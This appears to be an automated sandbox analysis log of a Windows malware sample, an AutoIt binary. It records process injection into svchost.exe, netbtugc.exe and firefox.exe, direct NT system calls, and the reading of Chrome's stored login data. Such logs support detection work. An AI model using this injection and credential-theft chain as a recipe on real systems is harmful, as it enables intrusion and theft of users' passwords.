Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] 2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] 2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] 2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] 2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] 2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] 2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h] 2_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h] 2_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h] 2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h] 2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h] 2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h] 2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h] 2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h] 2_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h] 2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h] 2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B892A mov eax, dword ptr fs:[00000030h] 2_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C892B mov eax, dword ptr fs:[00000030h] 2_2_032C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h] 2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h] 2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h] 2_2_032BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h] 2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h] 2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h] 2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h] 2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h] 2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h] 2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h] 2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h] 2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h] 2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h] 2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h] 2_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h] 2_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h] 2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h] 2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h] 2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h] 2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h] 2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h] 2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h] 2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h] 2_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h] 2_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h] 2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h] 2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h] 2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h] 2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h] 2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h] 2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h] 2_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h] 2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h] 2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h] 2_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h] 2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h] 2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h] 2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h] 2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h] 2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03260854 mov eax, dword ptr fs:[00000030h] 2_2_03260854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h] 2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h] 2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03230887 mov eax, dword ptr fs:[00000030h] 2_2_03230887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h] 2_2_032BC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h] 2_2_032FA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0325E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h] 2_2_0325EF28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h] 2_2_032E6F00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03232F12 mov eax, dword ptr fs:[00000030h] 2_2_03232F12
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326CF1F mov eax, dword ptr fs:[00000030h] 2_2_0326CF1F
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00C181F7
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BEA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BEA395
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BEA364 SetUnhandledExceptionFilter, 0_2_00BEA364

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtProtectVirtualMemory: Direct from: 0x77542F9C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtSetInformationProcess: Direct from: 0x77542C5C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtOpenKeyEx: Direct from: 0x77542B9C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtCreateFile: Direct from: 0x77542FEC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtOpenFile: Direct from: 0x77542DCC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtQueryInformationToken: Direct from: 0x77542CAC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtTerminateThread: Direct from: 0x77542FCC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtDeviceIoControlFile: Direct from: 0x77542AEC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtOpenSection: Direct from: 0x77542E0C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtAllocateVirtualMemory: Direct from: 0x775448EC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtSetInformationThread: Direct from: 0x775363F9 Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtQuerySystemInformation: Direct from: 0x775448CC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtReadVirtualMemory: Direct from: 0x77542E8C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtCreateKey: Direct from: 0x77542C6C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtSetInformationThread: Direct from: 0x77542B4C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtQueryAttributesFile: Direct from: 0x77542E6C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtCreateUserProcess: Direct from: 0x7754371C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtQueryInformationProcess: Direct from: 0x77542C26 Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtResumeThread: Direct from: 0x77542FBC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtWriteVirtualMemory: Direct from: 0x7754490C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtDelayExecution: Direct from: 0x77542DDC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtReadFile: Direct from: 0x77542ADC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtQuerySystemInformation: Direct from: 0x77542DFC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtResumeThread: Direct from: 0x775436AC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtNotifyChangeKey: Direct from: 0x77543C2C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtCreateMutant: Direct from: 0x775435CC Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtWriteVirtualMemory: Direct from: 0x77542E3C Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe NtMapViewOfSection: Direct from: 0x77542D1C Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Thread register set: target process: 7972 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Thread APC queued: target process: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 52B008 Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C18C93 LogonUserW, 0_2_00C18C93
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00BC3B4C
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00BC4A35
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C24EC9 mouse_event, 0_2_00C24EC9
Source: C:\Users\user\Desktop\150-425-2024.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\150-425-2024.exe" Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00C181F7
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C24C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00C24C03
Source: 150-425-2024.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914597799.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505927942.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656171114.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: 150-425-2024.exe, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914597799.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505927942.0000000001231000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914597799.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505927942.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656171114.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914597799.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505927942.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656171114.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE886B cpuid 0_2_00BE886B
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BF50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00BF50D7
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C02230 GetUserNameW, 0_2_00C02230
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BF418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00BF418A
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BC4AFE

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
